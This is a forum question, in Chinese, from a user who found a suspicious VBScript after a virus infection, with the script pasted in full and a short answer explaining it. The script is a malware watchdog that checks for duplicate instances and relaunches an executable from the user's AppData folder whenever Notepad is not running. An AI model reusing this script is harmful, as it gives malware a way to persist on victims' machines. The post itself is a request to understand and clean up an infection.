-3

我要先说对不起

这可能不是问这些问题的最佳场所,但我被病毒感染了,它似乎留下了痕迹。

如果有人能理解某些脚本背后的代码,我将不胜感激。

Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else 
    Do
        Pause(10) ' Pause 10 seconds 
        If CheckProcess(DblQuote(ProcessPath)) = False Then
            Call Logoff() 
        End If  
    Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
    strComputer = "."
    Tab = Split(ProcessPath,"\")
    ProcessName = Tab(UBound(Tab))
    ProcessName = Replace(ProcessName,Chr(34),"")
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'")
    If colProcesses.Count = 0 Then
        CheckProcess = False
    Else
        CheckProcess = True
    End if
End Function
'**************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
   Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit 
End sub
'**************************************************************************
Sub Pause(Secs)    
    Wscript.Sleep(Secs * 1000)    
End Sub   
'**************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function    
'***************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "\", "\\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'****************************************************************************

我希望我的代码格式正确,还有一些其他脚本,但在 txt 格式中,不同之处在于objShell.Exec它远程到“%working%”,如下所示:

objShell.Exec("%working%")^

如果它更容易,我将发布它的pastebin

AppVShNotifytvbs.vbs PasteBin 链接

AppVShNotifytvbs.txt Pastebin 链接

4

1 回答 1

0

首先,它检查前一个实例以查看当前脚本是否已经使用另一个进程 ID 运行。

然后,每 10 秒检查一次记事本是否正在运行。如果不是,它会调用 AppVShNotifyt.exe

于 2017-12-28T20:42:16.007 回答